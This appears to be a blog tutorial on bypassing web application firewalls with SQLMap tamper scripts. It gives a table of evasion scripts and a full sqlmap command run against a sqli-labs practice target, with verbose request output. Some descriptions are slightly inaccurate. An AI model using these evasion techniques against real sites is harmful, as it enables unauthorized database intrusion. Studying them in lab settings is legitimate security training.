Bypassing Web Application Firewall using Tamper Script via SQLMap

While attempting an injection through SQLMap, if you got something below-mentioned error as highlighted on my screen, then do not panic. 

 This error may occur for 3 major reasons, they are as follows:

1. The first reason is quite simple, the tested parameter has not appeared to be injectable.
2. If the error occurs due to a second reason, then it will be easily fixed by increasing the values of level and risk.
3. This error may occur if there is some kind of protection mechanism involved.

In this section, we will be going to attempt to bypass the web application firewall using the Tamper script.

The --tamper switch is basically used in the evasion of simple filters and Web Application Firewalls (in short WAFs).

To list the Tamper scripts, run the following command on the terminal:

┌──(kali㉿kali)-[~]

└─$ sqlmap --list-tampers

These Tamper scripts are a collection of in-built scripts which modify the injection vector used by SQLMap. For a better look, I have listed these scripts in a tabular form:

Name			Description
apostrophemask.py			Replaces the apostrophe character with its UTF-8 full-width counterpart.
apostrophenullencode.py			Replaces the apostrophe character with its illegal double Unicode counterpart.
appendnullbyte.py			Appends the encoded NULL byte character at the end of the payload.
base64encode.py			Base64 all characters in a given payload.
between.py			Replaces greater than operator (>) with NOT BETWEEN 0 AND #.
bluecoat.py			Replaces the space character after an SQL statement with a valid random blank character. Afterward, it replaces the character = with a LIKE operator.
chardoubleencode.py			Double URL—encodes all characters in a given payload (not processing those that are already encoded).
commalesslimit.py			Replaces instances like LIMIT M, N with LIMIT N OFFSET M.
commalessmid.py			Replaces instances like MID(A, B, C) with MID(A FROM B FOR C).
concat2concatws.py			Replaces instances like CONCAT(A, B) with CONCAT_WS(MID(CHAR(0), 0, 0), A, B).
charencode.py			URL—encodes all characters in a given payload (not processing those already encoded).
charunicodeencode.py			Unicode-URL—encodes non-encoded characters in a given payload (not processing those already encoded).
equaltolike.py			Replaces all occurrences of the operator equal (=) with the operator LIKE.
escapequotes.py			Slash escape quotes (' and ").
greatest.py			Replaces greater than operator (>) with GREATEST counterpart.
halfversionedmorekeywords.py			Adds a versioned MySQL comment before each keyword.
ifnull2ifisnull.py			Replaces instances like IFNULL(A, B) with IF(ISNULL(A), B, A).
modsecurityversioned.py			Embraces a complete query with a versioned comment.
modsecurityzeroversioned.py			Embraces a complete query with a zero versioned comment.
multiplespaces.py			Adds multiple spaces around SQL keywords.
nonrecursivereplacement.py			Replaces predefined SQL keywords with representations suitable for replacement (such as replace ("SELECT", "")) filters.
percentage.py			Adds a percentage sign (%) in front of each character.
overlongutf8.py			Converts all characters in a given payload (not processing those which are already encoded).
randomcase.py			Replaces each keyword character with a random case value.
randomcomments.py			Adds random comments to SQL keywords.
securesphere.py			Appends a specially crafted string.
sp_password.py			Appends sp_password to the end of the payload for automatic obfuscation from the DBMS logs.
space2comment.py			Replaces the space character (' ') with comments /**/.
space2dash.py			Replaces the space character (' ') with a dash comment (--) followed by a random string and a new line (\n).
space2hash.py			Replaces the space character (' ') with a pound character (#) followed by a random string and a new line (\n).
space2morehash.py			Replaces the space character (' ') with a pound character (#) followed by a random string and a new line (\n).
space2mssqlblank.py			Replaces the space character (' ') with a random blank character from a valid set of alternate characters.
space2mssqlhash.py			Replaces the space character (' ') with a pound character (#) followed by a new line (\n).
space2mysqlblank.py			Replaces the space character (' ') with a random blank character from a valid set of alternate characters.
space2mysqldash.py			Replaces the space character (' ') with a dash comment (--) followed by a new line (\n).
space2plus.py			Replaces the space character (' ') with plus (+).
space2randomblank.py			Replaces the space character (' ') with a random blank character from a valid set of alternate characters.
symboliclogical.py			Replaces AND and OR logical operators with their symbolic counterparts (&& and ||).
unionalltounion.py			Replaces UNION ALL SELECT with UNION SELECT.
unmagicquotes.py			Replaces the quote character (') with a multibyte combo %bf%27 together with a generic comment at the end (to make it work).
uppercase.py			Replaces each keyword character with an upper case value.
varnish.py			Appends an HTTP header X-originating-IP.
versionedkeywords.py			Encloses each non-function keyword with a versioned MySQL comment.
versionedmorekeywords.py			Encloses each keyword with a versioned MySQL comment.
xforwardedfor.py			Appends a fake HTTP header X-ForwardedFor.

Let's try and run one of the scripts called charencode.py, which replaces empty spaces with a + sign.

To run the tamper script mechanism, we'll use the --tamper switch with the name of the script, which in this case is charencode. For better results, I add --level switch with value 2 and --risk with value 2.

We'll also use the -v 4 level of verbosity to actually see the payload that was modified by the tamper script, as follows:

┌──(kali㉿kali)-[~]

└─$ sqlmap -u http://192.168.56.112/sqli-labs-master/Less-30/?id=1 --level 2 --risk 2 --tamper=charencode.py -v 4

The output is shown below:

        ___

       __H__

 ___ ___[(]_____ ___ ___  {1.6.7#stable}

|_ -| . [(]     | .'| . |

|___|_  [.]_|_|_|__,|  _|

      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:26:59 /2022-12-20/

[01:26:59] [DEBUG] cleaning up configuration parameters

[01:26:59] [INFO] loading tamper module 'charencode'

[01:26:59] [DEBUG] setting the HTTP timeout

[01:26:59] [DEBUG] setting the HTTP User-Agent header

[01:26:59] [DEBUG] creating HTTP requests opener object

[01:26:59] [INFO] testing connection to the target URL

[01:26:59] [TRAFFIC OUT] HTTP request [#1]:

GET /sqli-labs-master/Less-30/?id=1 HTTP/1.1

Cache-control: no-cache

User-agent: sqlmap/1.6.7#stable (https://sqlmap.org)

Host: 192.168.56.112

Accept: */*

Accept-encoding: gzip,deflate

Connection: close

[01:26:59] [DEBUG] declared web page charset 'utf-8'

[01:27:00] [INFO] testing if the target URL content is stable

[01:27:00] [TRAFFIC OUT] HTTP request [#2]:

GET /sqli-labs-master/Less-30/?id=1 HTTP/1.1

Cache-control: no-cache

User-agent: sqlmap/1.6.7#stable (https://sqlmap.org)

Host: 192.168.56.112

Accept: */*

Accept-encoding: gzip,deflate

Connection: close

<SNIP>

As you can see, the data mentioned in the payload sections of the output, are URL-encoded as per the charencode.py tamper script.

Tamper scripts are very experimental and should be used in a restricted or infrequent manner. Sometimes they may not work as expected. But these can sometimes be useful for evasion.